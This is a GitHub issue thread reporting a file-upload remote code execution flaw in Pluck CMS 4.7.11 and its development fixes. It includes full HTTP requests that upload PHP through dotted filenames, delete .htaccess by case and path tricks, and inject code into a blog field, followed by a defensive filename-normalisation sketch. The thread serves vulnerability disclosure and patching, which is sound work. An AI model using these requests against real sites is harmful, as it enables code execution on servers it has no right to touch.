
Pluck-4.7.11 admin backend has a remote command execution vulnerability when uploading files #91

Closed
wooyin opened this issue Dec 19, 2019 · 10 comments



wooyin commented Dec 19, 2019

Pluck-4.7.11's admin backend has a remote command execution vulnerability when uploading files.

Proof

Step 1: login -> pages -> manage files
Upload a .htaccess file; this turns files/.htaccess into .htaccess.txt.

Step 2: move .htaccess.txt into the trash.

Step 3: upload the shell code:

```http
POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--
```


Step 4: view http://127.0.0.1/pluck4711/files/pass07.php

@BSteelooper (Contributor) commented:

Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.

@BSteelooper (Contributor) commented:

Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?


wooyin commented Dec 19, 2019

It can be bypassed like this:

```http
GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1
```


wooyin commented Dec 19, 2019

And this way:

```http
POST /pluck-4.7.12-dev1/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 346
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="filefile"; filename=".htaccess..........."
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="submit"

Upload
-----------------------------293582696224464--
```

@BSteelooper (Contributor) commented:

How does this last one work? The ..... is not omitted, so it is not picked up by Apache?

@BSteelooper (Contributor) commented:

Could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2?


wooyin commented Dec 20, 2019

Use strtolower():

```http
GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1
```


wooyin commented Dec 20, 2019

And you should solve this too.

cont2 is vulnerable:

```http
POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+Exit
```


wooyin commented Dec 20, 2019

I tested on Windows; the system deletes the dots automatically.

@BSteelooper (Contributor) commented:

Ok.. I'll try to find a solution for the Windows mishaps.
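A defensive sketch of the normalisation this thread converges on, added here as an example and not code from the Pluck project: one function is applied to the filename before both the upload check and the deletefile check, so the direct-delete (var1=.htaccess), trailing-dot (.htaccess..........., which Windows stores as .htaccess) and mixed-case (.htACcess) variants all resolve to the same reserved name. Function names and the reserved-name list are assumptions; the sample inputs are constructed from the requests quoted above.

```php
<?php
// Added example, not Pluck's own code. Hypothetical helper names.

function normalize_upload_name(string $name): string
{
    $name = basename($name);               // drop any directory component
    $name = str_replace("\0", '', $name);  // NUL bytes have no place in a name
    // Windows silently strips trailing dots and spaces when it creates the
    // file, so "pass07.php......" and ".htaccess..........." land on disk as
    // "pass07.php" and ".htaccess". Apply the same rule before comparing.
    $name = rtrim($name, ". ");
    // Case-insensitive filesystems serve .htACcess as .htaccess, so compare
    // in lower case, as suggested in the thread.
    return strtolower($name);
}

function is_reserved_name(string $name): bool
{
    // .htaccess/.htpasswd for Apache; web.config is the IIS equivalent on Windows.
    static $reserved = ['.htaccess', '.htpasswd', 'web.config'];
    $n = normalize_upload_name($name);
    return $n === '' || in_array($n, $reserved, true);
}

// Constructed samples (name => should be refused by both upload and delete).
$samples = [
    '.htaccess'            => true,
    '.htaccess...........' => true,   // trailing-dot upload
    '.htACcess'            => true,   // mixed-case deletefile
    '../files/.htaccess'   => true,   // path component smuggled in var1
    '.htaccess.txt'        => false,  // renamed copy, not the live config
    'pass07.php......'     => false,  // not a reserved name; left to the .htaccess rules
];

foreach ($samples as $name => $expected) {
    $got = is_reserved_name($name);
    printf("%-22s reserved=%-5s %s\n", $name, var_export($got, true),
           $got === $expected ? 'ok' : 'MISMATCH');
}
```

Running the script prints one line per sample with `ok` on every row; the same `is_reserved_name()` call guards both the upload handler and the `deletefile` action, so the two code paths cannot drift apart again.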
